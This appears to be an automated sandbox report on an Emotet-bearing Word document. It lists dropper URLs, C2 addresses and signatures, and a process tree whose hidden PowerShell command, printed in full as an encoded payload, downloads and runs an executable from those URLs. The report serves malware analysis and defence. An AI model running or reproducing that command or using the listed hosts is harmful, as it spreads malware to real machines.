Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    27s
  • resource
    win10v191014
  • submitted
    24/01/2020, 08:50

General

  • Target

    11584b0cfff6964153002e14fef4c0c814249d36b51fe022a06235a77a5b4bc4.doc

  • Sample

    200124-hm2p6k48xa

  • SHA256

    11584b0cfff6964153002e14fef4c0c814249d36b51fe022a06235a77a5b4bc4

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://taichungchurch.com/calendar/con-9xr-04992723/

exe.dropper

http://test.nouraalmutairi.com/alfacgiapi/xa343f1lp-psspqrq-5769/

exe.dropper

http://sunshinewebsite.club/delcot/itqi-jettzdorn-7561/

exe.dropper

http://skyhimalayantours.com/nff/eynh46ml83-yebbh-72469/

exe.dropper

http://tecnobau.cl/wp-includes/omFJFdefZ/

Extracted

Family

emotet

C2

72.176.87.136:80

150.246.246.238:80

202.229.211.95:80

178.33.167.120:8080

144.76.56.36:8080

176.58.93.123:80

51.38.134.203:8080

185.207.57.205:443

192.241.220.183:8080

24.141.12.228:80

82.79.244.92:80

186.223.86.136:443

154.73.137.131:80

98.15.140.226:80

177.103.240.93:80

142.93.87.198:8080

158.69.167.246:8080

203.124.57.50:80

91.83.93.103:443

157.7.164.178:8081

rsa_pubkey.plain

Signatures

  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\11584b0cfff6964153002e14fef4c0c814249d36b51fe022a06235a77a5b4bc4.doc" /o ""
    1⤵
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    • Checks processor information in registry
    PID:4968
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABGAHoAZgBqAG4AbAB4AGYAagBkAGgAagA9ACcAWgB6AG0AZwBsAHYAZgBxAGwAYwBmAGYAJwA7ACQAQwByAGMAcQBpAGQAdgBxAHIAYwAgAD0AIAAnADIANgA5ACcAOwAkAFQAeABlAGMAdgBiAGwAbAB3AHoAZwBoAGUAPQAnAEoAdABxAG4AZQB2AGQAbABxAGcAbwBvAG4AJwA7ACQARQBxAGgAbAByAGYAbgByAGYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEMAcgBjAHEAaQBkAHYAcQByAGMAKwAnAC4AZQB4AGUAJwA7ACQASABlAHEAZgBxAGYAYwBoAD0AJwBOAG4AcQBnAGYAbwBiAHIAbQB0AGwAbwAnADsAJABMAGUAZABqAGYAbgB6AHEAagBhAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAFcAZQBiAEMATABJAGUAbgBUADsAJABTAHMAbwBvAHAAYwBrAHIAPQAnAGgAdAB0AHAAOgAvAC8AdABhAGkAYwBoAHUAbgBnAGMAaAB1AHIAYwBoAC4AYwBvAG0ALwBjAGEAbABlAG4AZABhAHIALwBjAG8AbgAtADkAeAByAC0AMAA0ADkAOQAyADcAMgAzAC8AKgBoAHQAdABwADoALwAvAHQAZQBzAHQALgBuAG8AdQByAGEAYQBsAG0AdQB0AGEAaQByAGkALgBjAG8AbQAvAGEAbABmAGEAYwBnAGkAYQBwAGkALwB4AGEAMwA0ADMAZgAxAGwAcAAtAHAAcwBzAHAAcQByAHEALQA1ADcANgA5AC8AKgBoAHQAdABwADoALwAvAHMAdQBuAHMAaABpAG4AZQB3AGUAYgBzAGkAdABlAC4AYwBsAHUAYgAvAGQAZQBsAGMAbwB0AC8AaQB0AHEAaQAtAGoAZQB0AHQAegBkAG8AcgBuAC0ANwA1ADYAMQAvACoAaAB0AHQAcAA6AC8ALwBzAGsAeQBoAGkAbQBhAGwAYQB5AGEAbgB0AG8AdQByAHMALgBjAG8AbQAvAG4AZgBmAC8AZQB5AG4AaAA0ADYAbQBsADgAMwAtAHkAZQBiAGIAaAAtADcAMgA0ADYAOQAvACoAaAB0AHQAcAA6AC8ALwB0AGUAYwBuAG8AYgBhAHUALgBjAGwALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBvAG0ARgBKAEYAZABlAGYAWgAvACcALgAiAFMAUABsAGAASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQARABxAG0AbwB2AGgAbgB5AD0AJwBSAGIAcQB6AGkAdABnAGwAbgB0AHEAaQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQwBhAHAAegBvAHQAaAB3AHAAawB2AGoAIABpAG4AIAAkAFMAcwBvAG8AcABjAGsAcgApAHsAdAByAHkAewAkAEwAZQBkAGoAZgBuAHoAcQBqAGEALgAiAGQAbwB3AGAATgBgAEwATwBBAEQAZgBpAGwAZQAiACgAJABDAGEAcAB6AG8AdABoAHcAcABrAHYAagAsACAAJABFAHEAaABsAHIAZgBuAHIAZgApADsAJABMAHIAbgB4AGIAagBzAHQAawA9ACcAQQBzAG8AbAB3AGcAcABmACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQARQBxAGgAbAByAGYAbgByAGYAKQAuACIAbABFAGAATgBHAFQAaAAiACAALQBnAGUAIAAzADgAMAA4ADAAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAEEAYABSAHQAIgAoACQARQBxAGgAbAByAGYAbgByAGYAKQA7ACQAWQBjAGkAcwBuAGEAYgB6AD0AJwBDAGgAYwBkAHQAcQB3AHoAYQB5AHIAYwAnADsAYgByAGUAYQBrADsAJABBAHIAegBxAG4AYgBkAHAAcAA9ACcATABvAGoAdwBzAHIAawBjAGcAeABsAG0AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQBzAGYAeABxAGwAdwBlAD0AJwBWAGEAawBtAGoAcwBuAHMAdQBrAGkAYgAnAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4572
    • C:\Users\Admin\269.exe
      "C:\Users\Admin\269.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4704
      • C:\Users\Admin\269.exe
        --ad15cb13
        3⤵
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:3912

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3912-8-0x0000000002240000-0x0000000002257000-memory.dmp

    Filesize

    92KB

  • memory/3912-9-0x0000000000400000-0x0000000000472000-memory.dmp

    Filesize

    456KB

  • memory/4704-6-0x00000000022B0000-0x00000000022C7000-memory.dmp

    Filesize

    92KB